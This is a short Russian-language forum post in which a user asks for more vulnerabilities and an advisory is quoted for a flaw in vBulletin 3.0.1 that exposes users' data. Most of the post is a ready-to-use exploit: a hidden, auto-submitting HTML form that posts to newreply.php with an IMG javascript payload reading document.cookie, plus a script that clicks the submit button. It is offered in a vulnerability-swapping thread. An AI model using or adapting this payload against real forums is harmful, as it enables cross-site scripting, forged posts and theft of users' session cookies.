Сообщение от
JIaMo
а есть тут еще уязвимости??
Программа: vBulletin 3.0.1
Опасность: Низкая
Наличие эксплоита: Да
Описание: Обнаружена уязвимость в vBulletin. Удаленный атакующий может получить доступ к важной информации пользователей.
Пример/Эксплоит:
<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="<IMG src="javascript
:alert(document.cookie)"& gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
<script>
document.all.preview.click();
</script>